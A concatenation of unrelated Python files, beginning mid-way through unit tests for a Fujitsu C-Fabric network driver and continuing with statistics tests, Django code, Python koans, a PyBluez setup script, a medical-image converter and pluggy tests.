mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_already_cleared_all_definitions(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
interface 1/1/0/1
exit
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_exists_different_vlan(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
cfab port-mode external
type endpoint
exit
vfab 1 vlan 100 endpoint untag 0
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('vlan', 'delete', vlanid=100) \
+ cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_exists_different_vlans(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
cfab port-mode external
type endpoint
exit
vfab 1 vlan 100 endpoint untag 0
vfab 1 vlan 200 endpoint untag 0
vfab 1 vlan 300 endpoint untag 0
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('vlan', 'delete', vlanid=100) \
+ cfab_cmd('vlan', 'delete', vlanid=200) \
+ cfab_cmd('vlan', 'delete', vlanid=300) \
+ cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_exists_different_vlan_with_range(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
ifgroup 1 ether 1/1/0/2
interface 1/1/0/1
cfab port-mode external
type endpoint
exit
vfab 1 vlan 100 endpoint untag 0-1
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('vlan', 'replace', vlanid=100, ifg=1) \
+ cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_exists_lag(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
type linkaggregation 1
exit
linkaggregation 1 1 mode active
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 type endpoint
vfab 1 vlan 8 endpoint untag 0
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_exists_lag_without_vlan(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
type linkaggregation 1
exit
linkaggregation 1 1 mode active
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 type endpoint
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_exists_lag_without_interface(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
exit
linkaggregation 1 1 mode active
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 type endpoint
vfab 1 vlan 8 endpoint untag 0
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_illegal_exists_port_range(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1,1/1/0/2
interface 1/1/0/1
cfab port-mode external
type endpoint
exit
interface 1/1/0/2
cfab port-mode external
type endpoint
exit
vfab 1 vlan 8 endpoint untag 0
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete')
self.assert_configured(expect)
class TestCFABdriverClearVlanWithLAG(BaseTestCFABdriver):
"""Test Fujitsu C-Fabric mechanism driver for VLAN configuration."""
def setUp(self):
cfg.CONF.set_override('share_pprofile', True, "fujitsu_cfab")
cfg.CONF.set_override('pprofile_prefix', "test-", "fujitsu_cfab")
super(TestCFABdriverClearVlanWithLAG, self).setUp()
self.ports = "1/1/0/1,1/1/0/2"
def test_raises(self):
mgr = self.driver.mgr
cfab = self.driver
for er in [EOFError, EnvironmentError, OSError, select.error]:
mgr.get_candidate_config.side_effect = er
self.assertRaises(er,
cfab.clear_vlan_with_lag, 'a', 'u', 'p', '1', 8,
self.ports, self.mac)
self.assertEqual(4, mgr.close_session.call_count)
def test_ifgroup_ether_is_exhausted(self):
cfab = self.driver
mgr = self.driver.mgr
candidate = ""
for i in range(0, 4096):
candidate += 'ifgroup {if_id} ether 1/1/0/{port}\n'.format(
if_id=i, port=(i + 1))
mgr.get_candidate_config.return_value = candidate
ret = cfab.clear_vlan_with_lag("a", "u", "p", "1", 8,
self.ports, self.mac)
self.assertIsNone(ret)
def test_clear_with_no_command(self):
cfab = self.driver
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
type linkaggregation 1
lldp mode enable
exit
interface 1/1/0/2
type linkaggregation 1
lldp mode enable
exit
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 mode active
linkaggregation 1 1 type endpoint
vfab 1 vlan 8 endpoint untag 0
"""
cfab.clear_vlan_with_lag("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('vlan', 'delete') + cfab_cmd('lag', 'delete')
self.assert_configured(expect)
def test_eliminate_own_definition(self):
cfab = self.driver
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
ifgroup 1 linkaggregation 1 2
interface 1/1/0/1
type linkaggregation 1
lldp mode enable
exit
interface 1/1/0/2
type linkaggregation 1
lldp mode enable
exit
interface 1/1/0/3
type linkaggregation 2
lldp mode enable
exit
interface 1/1/0/4
type linkaggregation 2
lldp mode enable
exit
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 mode active
linkaggregation 1 1 type endpoint
linkaggregation 1 2 cfab port-mode external
linkaggregation 1 2 mode active
linkaggregation 1 2 type endpoint
vfab 1 vlan 8 endpoint untag 0,1
"""
cfab.clear_vlan_with_lag("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('vlan', 'replace', ifg='1') \
+ cfab_cmd('lag', 'delete')
self.assert_configured(expect)
def test_already_cleared_only_interface(self):
cfab = self.driver
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
lldp mode enable
exit
interface 1/1/0/2
lldp mode enable
exit
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 mode active
linkaggregation 1 1 type endpoint
vfab 1 vlan 8 endpoint untag 0
"""
cfab.clear_vlan_with_lag("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports)
self.assert_configured(expect)
def test_already_cleared_only_vlan(self):
cfab = self.driver
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
type linkaggregation 1
lldp mode enable
exit
interface 1/1/0/2
type linkaggregation 1
lldp mode enable
exit
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 mode active
linkaggregation 1 1 type endpoint
"""
cfab.clear_vlan_with_lag("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('lag', 'delete')
self.assert_configured(expect)
def test_already_cleared_lag_definition(self):
cfab = self.driver
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
type linkaggregation 1
lldp mode enable
exit
interface 1/1/0/2
type linkaggregation 1
lldp mode enable
exit
vfab 1 vlan 8 endpoint untag 0
"""
cfab.clear_vlan_with_lag("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('vlan', 'delete') \
+ cfab_cmd('lag', 'delete')
self.assert_configured(expect)
def test_already_cleared_all_definitions(self):
cfab = self.driver
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
interface 1/1/0/1
exit
"""
cfab.clear_vlan_with_lag("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports)
self.assert_configured(expect)
def test_exists_ether_vlan(self):
cfab = self.driver
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
ifgroup 1 ether 1/1/0/2
interface 1/1/0/1
type endpoint
cfab port-mode external
exit
interface 1/1/0/2
type endpoint
cfab port-mode external
exit
vfab 1 vlan 8 endpoint untag 0-1
"""
cfab.clear_vlan_with_lag("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports)
self.assert_configured(expect)
class TestCFABdriverPrivateMethods(BaseTestCFABdriver):
"""Test Fujitsu C-Fabric mechanism driver with private methods.
This class is for illegal case tests.
"""
def setUp(self):
cfg.CONF.set_override('share_pprofile', True, "fujitsu_cfab")
cfg.CONF.set_override('pprofile_prefix', "test-", "fujitsu_cfab")
super(TestCFABdriverPrivateMethods, self).setUp()
def test_is_ifgroup_included_between_range(self):
ifgroup_id = 2
ifgroups = '1-3'
self.assertTrue(cfabdriver._is_ifgroup_included(ifgroup_id, ifgroups))
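# Assumed semantics, for illustration only: _is_ifgroup_included treats
# its second argument as a C-Fabric ifgroup list, so id 2 falls inside
# '1-3' but would fall outside a list such as '0,4-5'.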
def cfab_cmd(target, op, vfab_id='1', vlanid=8, pp_name='test-1', ppid='0',
lag=False, ports='1/1/0/1', domain_id='1', lag_id='1', ifg='0'):
"""Expected result for C-Fabric commands via operations.
@param target A string of target definition name. Following targets are
available:
'interface', 'lag', 'vlan', 'ifgroup', 'ifgroup_lag'
'assoc', 'pp_assoc'
@param op A string of operation. Following operations are available:
'add', 'replace', 'delete'
@return ret A list of string object
"""
ret = []
if target == 'interface':
ret.append("interface range {ports}".format(ports=ports))
if op in ('add', 'replace'):
if lag:
ret.append('type linkaggregation {lag}'.format(lag=lag_id))
else:
ret.append("cfab port-mode external")
ret.append("type endpoint")
if op == 'delete':
ret.append('no type')
ret.append("no cfab port-mode")
ret.append('exit')
elif target == 'lag':
lag = 'linkaggregation {dom} {lag}'.format(lag=lag_id, dom=domain_id)
if op in ('add', 'replace'):
ret.append(lag + ' cfab port-mode external')
ret.append(lag + ' mode active')
ret.append(lag + ' type endpoint')
if op == 'delete':
ret.append('no ' + lag + ' cfab port-mode')
ret.append('no ' + lag + ' mode')
ret.append('no ' + lag + ' type')
elif target == 'vlan':
if op in ('add', 'replace'):
ret.append("vfab {vfab} vlan {vid} endpoint untag {ifg}".format(
vfab=vfab_id, vid=vlanid, ifg=ifg))
if op == 'delete':
ret.append("no vfab {vfab} vlan {vid} endpoint untag".format(
vfab=vfab_id, vid=vlanid))
elif target == 'ifgroup':
if op == 'add':
if lag:
ret.append("ifgroup {ifg} linkaggregation {dom} {lag}".format(
ifg=ifg, dom=domain_id, lag=lag_id))
else:
ret.append('ifgroup {ifg} ether {p}'.format(ifg=ifg, p=ports))
elif target == 'assoc':
if op == 'delete':
ret.append("no pprofile {pp_name}".format(pp_name=pp_name))
elif target == 'pp_assoc':
if op == 'delete':
ret.append("no vfab {vfab} pprofile {ppid}".format(
vfab=vfab_id, ppid=ppid))
ret.append("no pprofile {pp_name}".format(pp_name=pp_name))
else:
raise ValueError('Illegal target(%s) is specified' % target)
return ret
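# A minimal illustration (not part of the test suite) of what cfab_cmd
# yields with the defaults defined above:
#   cfab_cmd('vlan', 'add')         -> ['vfab 1 vlan 8 endpoint untag 0']
#   cfab_cmd('vlan', 'delete')      -> ['no vfab 1 vlan 8 endpoint untag']
#   cfab_cmd('ifgroup', 'add')      -> ['ifgroup 0 ether 1/1/0/1']
#   cfab_cmd('interface', 'delete') -> ['interface range 1/1/0/1',
#                                       'no type', 'no cfab port-mode', 'exit']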
|
import unittest
import subprocess
class ConversionTestCase(unittest.TestCase):
conversion_cls = None
def setUp(self):
super(ConversionTestCase, self).setUp()
self.conversion = self.conversion_cls()
self.null = open('/dev/null', 'w')
def tearDown(self):
super(ConversionTestCase, self).tearDown()
self.null.close()
def assertCommandExists(self, command):
rt = subprocess.call(['which', command], stdout=self.null)
self.assertEqual(rt, 0, 'Command {} not found'.format(command))
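# A minimal sketch (not from the original suite) of how a concrete test
# could build on this base class; EchoConversion is a dummy stand-in for
# a real conversion class.
class EchoConversion(object):
"""Trivial stand-in so the base-class wiring above is runnable."""
pass
class EchoConversionTestCase(ConversionTestCase):
conversion_cls = EchoConversion
def test_required_tool_is_installed(self):
# 'ls' exists on any POSIX system, so this assertion passes.
self.assertCommandExists('ls')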
|
"""
Unit Tests for seq_prob_ratio.py
"""
import math
from nose.tools import assert_equal, assert_almost_equal, assert_less, raises
from nose.plugins.attrib import attr
from ..sprt import seq_prob_ratio
from ..sprt import bernoulli_lh
from ..sprt import bernoulli_seq_ratio
from ..sprt import normal_lh
from ..sprt import normal_seq_ratio
from ..sprt import hypergeom_lh
from ..sprt import hypergeom_seq_ratio
import numpy as np
import scipy
from scipy.special import comb
def test_normalTRUE():
assert_equal(seq_prob_ratio(0.5, 0.1, [1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7, 8, 9, 8, 7, 6, 5, 4, 3], 0.05, 0.6, "normal", True)[0], 1)
def test_normalFALSE():
assert_equal(seq_prob_ratio(0.5, 0.1, [1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7, 8, 9, 8, 7, 6, 5, 4, 3], 0.05, 0.6, "normal", False)[0], 1)
def test_bernoulliTRUE():
assert_equal(math.trunc(seq_prob_ratio(0.5, 0.1, [0, 1], 0.05, 0.05, "bernoulli", True)[0]), 0)
def test_bernoulliFALSE():
assert_equal(seq_prob_ratio(0.5, 0.1, [0, 1], 0.05, 0.05, "bernoulli", False)[0], None)
def test_hypergeomTRUE():
assert_equal(seq_prob_ratio(0.5, 0.1, [1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7, 8, 9, 8, 7, 6, 5, 4, 3], 0.05, 0.6, "hypergeometric", True)[0], 0)
def test_hypergeomFALSE():
assert_equal(seq_prob_ratio(0.5, 0.1, [1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7, 8, 9, 8, 7, 6, 5, 4, 3], 0.05, 0.6, "hypergeometric", False)[0], 0)
def test_normalFALSE2():
assert_equal(seq_prob_ratio(0.5, 0.1, [0, 1], 0.05, 0.05, "normal", False)[0], None)
def test_hypergeomFALSE2():
    assert_equal(seq_prob_ratio(0.5, 0.1, [0, 1], 0.05, 0.05, "hypergeometric", False)[0], None)
def test_normalTRUE2():
assert_equal(seq_prob_ratio(0.5, 0.1, [0, 1], 0.05, 0.05, "normal", True)[2], "Reject null hypothesis.")
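# Reference note (standard Wald SPRT, independent of this implementation):
# with error rates alpha and beta, the likelihood ratio LR is compared to
#     A = (1 - beta) / alpha   -> stop and reject H0 when LR >= A
#     B = beta / (1 - alpha)   -> stop and accept H0 when LR <= B
# e.g. alpha = beta = 0.05 gives A = 19 and B = 1/19; otherwise sampling
# continues.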
|
""" Melhore o jogo do desafio 028 onde computador vai "pensar" em
um numero entre 0 e 10. So que agora o jogador vai tentar adivinhar
até acertar, mostrando no final quantos palpites foram
necessarios para vencer. """
from random import randint
numero = randint(0,10)
jogador = int(input('Qual numero o computador pensou [0 a 10]? '))
cont = 0
while numero != jogador:
cont += 1
print('VOCÊ ERROU, TENTE NOVAMENTE!', end='')
jogador = int(input('Informe um numero:'))
print(f'Parabens você VENCEU, foram necessaria {cont} tentativas!')
|
from django.contrib.auth import get_user_model
from rest_framework import viewsets
from django_pyjwt_example import serializers
class UserViewSet(viewsets.ReadOnlyModelViewSet):
queryset = get_user_model().objects.all()
serializer_class = serializers.UserSerializer
|
from django.db import models
from .validators import validate_is_pdf
class PdfFile(models.Model):
series = models.ForeignKey(
'Series',
on_delete=models.CASCADE,
related_name='pdfs',
blank=True,
null=True,
)
file = models.FileField(upload_to='pdfs/%Y/', validators=[validate_is_pdf])
is_imported = models.BooleanField(default=False)
def __str__(self):
return f'<{self.__class__.__name__} {self.file.name}>'
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
class AboutIteration(Koan):
def test_iterators_are_a_type(self):
it = iter(range(1,6))
total = 0
for num in it:
total += num
# >>> [x for x in range(1,6)]
# [1, 2, 3, 4, 5]
self.assertEqual(15, total)
def test_iterating_with_next(self):
stages = iter(['alpha','beta','gamma'])
try:
self.assertEqual('alpha', next(stages))
next(stages)
self.assertEqual('gamma', next(stages))
next(stages)
except StopIteration as ex:
err_msg = 'Ran out of iterations'
self.assertRegex(err_msg, 'Ran out of iterations')
# ------------------------------------------------------------------
def add_ten(self, item):
return item + 10
def test_map_transforms_elements_of_a_list(self):
seq = [1, 2, 3]
mapped_seq = list()
mapping = map(self.add_ten, seq)
self.assertNotEqual(list, mapping.__class__)
self.assertEqual(map, mapping.__class__)
# In Python 3 built in iterator funcs return iterable view objects
# instead of lists
for item in mapping:
mapped_seq.append(item)
self.assertEqual([11, 12, 13], mapped_seq)
# Note, iterator methods actually return objects of iter type in
# python 3. In python 2 map() would give you a list.
def test_filter_selects_certain_items_from_a_list(self):
# >>> seq = [1, 2, 3, 4, 5, 6]
# >>> def is_even(item): return (item % 2) == 0
# ...
# >>> f = filter(is_even, seq)
# >>> type(f)
# <class 'filter'>
# >>> type(list(f))
# <class 'list'>
# >>> list(f)
# [] # NOPE
# >>> f
# <filter object at 0x10a41e908>
# >>> iter(f)
# <filter object at 0x10a41e908>
# >>> [x for x in f] # STILL NOPE
# []
# >>> [x for x in filter(is_even, seq)] # OK
# [2, 4, 6]
# >>> f = filter(is_even, seq)
# >>> next(f)
# 2
# >>> next(f)
# 4
# >>> next(f)
# 6
# >>> next(f)
# Traceback (most recent call last):
# File "<stdin>", line 1, in <module>
# StopIteration
def is_even(item):
return (item % 2) == 0
seq = [1, 2, 3, 4, 5, 6]
even_numbers = list()
for item in filter(is_even, seq):
even_numbers.append(item)
self.assertEqual([2, 4, 6], even_numbers)
def test_just_return_first_item_found(self):
def is_big_name(item):
return len(item) > 4
names = ["Jim", "Bill", "Clarence", "Doug", "Eli","BadBoyBuba"]
name = None
iterator = filter(is_big_name, names)
try:
name = next(iterator)
print(f"next: {name}") # next: Clarence
name = next(iterator)
print(f"next: {name}") # next: BadBoyBuba
name = next(iterator) # trigger exception
print(f"next: {name}")
except StopIteration:
msg = 'Ran out of big names'
print(f"StopIteration: {msg}")
self.assertEqual('BadBoyBuba', name)
# ------------------------------------------------------------------
def add(self,accum,item):
return accum + item
def multiply(self,accum,item):
return accum * item
def test_reduce_will_blow_your_mind(self):
import functools
# As of Python 3 reduce() has been demoted from a builtin function
# to the functools module.
result = functools.reduce(self.add, [2, 3, 4])
self.assertEqual(int, result.__class__)
# Reduce() syntax is same as Python 2
self.assertEqual(9, result)
result2 = functools.reduce(self.multiply, [2, 3, 4], 1)
self.assertEqual(24, result2)
# Extra Credit:
# Describe in your own words what reduce does.
        # take the first two items and pass them to the function;
        # use the returned value and the next item as the new arguments;
        # keep going until no items are left, then return the final value.
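        # e.g. functools.reduce(self.add, [2, 3, 4]) evaluates as
        # self.add(self.add(2, 3), 4) == 9, and with an initializer
        # functools.reduce(self.multiply, [2, 3, 4], 1) == ((1 * 2) * 3) * 4 == 24.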
# ------------------------------------------------------------------
def test_use_pass_for_iterations_with_no_body(self):
for num in range(1,5):
pass
self.assertEqual(4, num)
# ------------------------------------------------------------------
def test_all_iteration_methods_work_on_any_sequence_not_just_lists(self):
# Ranges are an iterable sequence
# filter(by_this_function, data_to_filter)
# map(apply_this_function, data_to_process)
result = map(self.add_ten, range(1,4))
self.assertEqual([11,12,13], list(result))
try:
file = open("example_file.txt")
# contains:
# this
# is
# a
# test
try:
def make_upcase(line):
return line.strip().upper()
upcase_lines = map(make_upcase, file.readlines())
self.assertEqual(['THIS', 'IS', 'A', 'TEST'], list(upcase_lines))
finally:
# Arg, this is ugly.
# We will figure out how to fix this later.
file.close()
except IOError:
# should never happen
self.fail()
def test_quick_re_write_of_previous_test(self):
# Ranges are an iterable sequence
# filter(by_this_function, data_to_filter)
# map(apply_this_function, data_to_process)
        try:  # this should close the file on a raise - test?
with open("example_file.txt") as f:
def make_upcase(line):
return line.strip().upper()
upcase_lines = map(make_upcase, f.readlines())
self.assertEqual(['THIS', 'IS', 'A', 'TEST'], list(upcase_lines))
except IOError:
# should never happen
self.fail()
|
#!/usr/bin/env python
from setuptools import setup, Extension
import sys
import platform
import os
from py4a import patch_distutils
patch_distutils()
mods = []
if sys.platform == 'win32':
XP2_PSDK_PATH = os.path.join(os.getenv('ProgramFiles'), r"Microsoft Platform SDK for Windows XP SP2")
S03_PSDK_PATH = os.path.join(os.getenv('ProgramFiles'), r"Microsoft Platform SDK")
    S08_PSDK_PATH = os.path.join(os.getenv('ProgramFiles'), r"Microsoft SDKs\Windows\v6.0A")
PSDK_PATH = None
for p in [ XP2_PSDK_PATH, S03_PSDK_PATH, S08_PSDK_PATH ]:
if os.path.exists(p):
PSDK_PATH = p
break
if PSDK_PATH is None:
raise SystemExit ("Can't find the Windows XP Platform SDK")
lib_path = os.path.join(PSDK_PATH, 'Lib')
if '64' in platform.architecture()[0]:
lib_path = os.path.join(lib_path, 'x64')
mod1 = Extension ('bluetooth._msbt',
include_dirs = ["%s\\Include" % PSDK_PATH],
library_dirs = [lib_path],
libraries = [ "WS2_32", "Irprops" ],
sources=['msbt\\_msbt.c'],)
mods = [ mod1 ]
# widcomm ?
WC_BASE = os.path.join(os.getenv('ProgramFiles'), r"Widcomm\BTW DK\SDK")
if os.path.exists (WC_BASE):
mod2 = Extension ('bluetooth._widcomm',
include_dirs = [ "%s\\Inc" % WC_BASE ],
define_macros = [ ('_BTWLIB', None) ],
library_dirs = [ "%s\\Release" % WC_BASE,
"%s\\Lib" % PSDK_PATH, ],
libraries = [ "WidcommSdklib", "ws2_32", "version", "user32", "Advapi32", "Winspool", "ole32", "oleaut32" ],
sources = [ "widcomm\\_widcomm.cpp",
"widcomm\\inquirer.cpp",
"widcomm\\rfcommport.cpp",
"widcomm\\rfcommif.cpp",
"widcomm\\l2capconn.cpp",
"widcomm\\l2capif.cpp",
"widcomm\\sdpservice.cpp",
"widcomm\\util.cpp" ]
)
mods.append (mod2)
elif sys.platform.startswith('linux'):  # 'linux2' on Python 2, 'linux' on Python 3+
mod1 = Extension('bluetooth._bluetooth',
sources = ['bluez/bluetooth/hci.c',
'bluez/bluetooth/bluetooth.c',
'bluez/bluetooth/sdp.c',
'bluez/btmodule.c',
'bluez/btsdp.c'])
mods = [ mod1 ]
elif sys.platform == 'darwin':
mod1 = Extension('bluetooth._osxbt',
include_dirs = ["/System/Library/Frameworks/IOBluetooth.framework/Headers",
"/System/Library/Frameworks/CoreFoundation.framework/Headers"],
extra_link_args = ['-framework IOBluetooth -framework CoreFoundation'],
sources = ['osx/_osxbt.c']
)
mods = [ mod1 ]
setup ( name = 'PyBluez',
version = '0.19',
description = 'Bluetooth Python extension module',
author="Albert Huang",
author_email="ashuang@alum.mit.edu",
url="http://org.csail.mit.edu/pybluez",
ext_modules = mods,
packages = [ "bluetooth", ],
# for the python cheese shop
classifiers = [ 'Development Status :: 4 - Beta',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Programming Language :: Python',
'Topic :: Communications' ],
download_url = 'http://org.csail.mit.edu/pybluez/download.html',
long_description = 'Bluetooth Python extension module to allow Python developers to use system Bluetooth resources. PyBluez works with GNU/Linux and Windows XP.',
maintainer = 'Albert Huang',
maintainer_email = 'ashuang@alum.mit.edu',
license = 'GPL',
)
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Converts .nii files in LiTS dataset to .npy files.
This script should be run just once before running convert_lits.{py,borg}.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import multiprocessing
import os
# Standard Imports
import nibabel as nib
import numpy as np
num_processes = 2
input_path = "Downloads/LiTS/Train/" # where the .nii files are.
output_path = "Downloads/LiTS/Train_np/" # where you want to put the npy files.
def process_one_file(image_path):
"""Convert one nii file to npy."""
im_id = os.path.basename(image_path).split("volume-")[1].split(".nii")[0]
label_path = image_path.replace("volume-", "segmentation-")
image = nib.load(image_path).get_data().astype(np.float32)
label = nib.load(label_path).get_data().astype(np.float32)
print("image shape: {}, dtype: {}".format(image.shape, image.dtype))
print("label shape: {}, dtype: {}".format(label.shape, label.dtype))
np.save(os.path.join(output_path, "volume-{}.npy".format(im_id)), image)
np.save(os.path.join(output_path, "segmentation-{}.npy".format(im_id)), label)
# Guard the pool so spawned worker processes don't re-execute this block on
# import (required for multiprocessing on platforms that spawn, e.g. Windows).
if __name__ == "__main__":
    nii_dir = os.path.join(input_path, "volume-*")
    p = multiprocessing.Pool(num_processes)
    p.map(process_one_file, glob.glob(nii_dir))
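# Example (hypothetical case id 42): Downloads/LiTS/Train/volume-42.nii is
# paired with Downloads/LiTS/Train/segmentation-42.nii and written out as
# Train_np/volume-42.npy and Train_np/segmentation-42.npy.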
|
import pytest
from pluggy import PluginManager, HookimplMarker, HookspecMarker
hookspec = HookspecMarker("example")
hookimpl = HookimplMarker("example")
def test_parse_hookimpl_override() -> None:
class MyPluginManager(PluginManager):
def parse_hookimpl_opts(self, module_or_class, name):
opts = PluginManager.parse_hookimpl_opts(self, module_or_class, name)
if opts is None:
if name.startswith("x1"):
opts = {} # type: ignore[assignment]
return opts
class Plugin:
def x1meth(self):
pass
@hookimpl(hookwrapper=True, tryfirst=True)
def x1meth2(self):
yield # pragma: no cover
class Spec:
@hookspec
def x1meth(self):
pass
@hookspec
def x1meth2(self):
pass
pm = MyPluginManager(hookspec.project_name)
pm.register(Plugin())
pm.add_hookspecs(Spec)
hookimpls = pm.hook.x1meth.get_hookimpls()
assert len(hookimpls) == 1
assert not hookimpls[0].hookwrapper
assert not hookimpls[0].tryfirst
assert not hookimpls[0].trylast
assert not hookimpls[0].optionalhook
hookimpls = pm.hook.x1meth2.get_hookimpls()
assert len(hookimpls) == 1
assert hookimpls[0].hookwrapper
assert hookimpls[0].tryfirst
def test_warn_when_deprecated_specified(recwarn) -> None:
warning = DeprecationWarning("foo is deprecated")
class Spec:
@hookspec(warn_on_impl=warning)
def foo(self):
pass
class Plugin:
@hookimpl
def foo(self):
pass
pm = PluginManager(hookspec.project_name)
pm.add_hookspecs(Spec)
with pytest.warns(DeprecationWarning) as records:
pm.register(Plugin())
(record,) = records
assert record.message is warning
assert record.filename == Plugin.foo.__code__.co_filename
assert record.lineno == Plugin.foo.__code__.co_firstlineno
def test_plugin_getattr_raises_errors() -> None:
"""Pluggy must be able to handle plugins which raise weird exceptions
when getattr() gets called (#11).
"""
class DontTouchMe:
def __getattr__(self, x):
raise Exception("can't touch me")
class Module:
pass
module = Module()
module.x = DontTouchMe() # type: ignore[attr-defined]
pm = PluginManager(hookspec.project_name)
# register() would raise an error
pm.register(module, "donttouch")
assert pm.get_plugin("donttouch") is module
def test_not_all_arguments_are_provided_issues_a_warning(pm: PluginManager) -> None:
"""Calling a hook without providing all arguments specified in
the hook spec issues a warning."""
class Spec:
@hookspec
def hello(self, arg1, arg2):
pass
@hookspec(historic=True)
def herstory(self, arg1, arg2):
pass
pm.add_hookspecs(Spec)
with pytest.warns(UserWarning, match=r"'arg1', 'arg2'.*cannot be found.*$"):
pm.hook.hello()
with pytest.warns(UserWarning, match=r"'arg2'.*cannot be found.*$"):
pm.hook.hello(arg1=1)
with pytest.warns(UserWarning, match=r"'arg1'.*cannot be found.*$"):
pm.hook.hello(arg2=2)
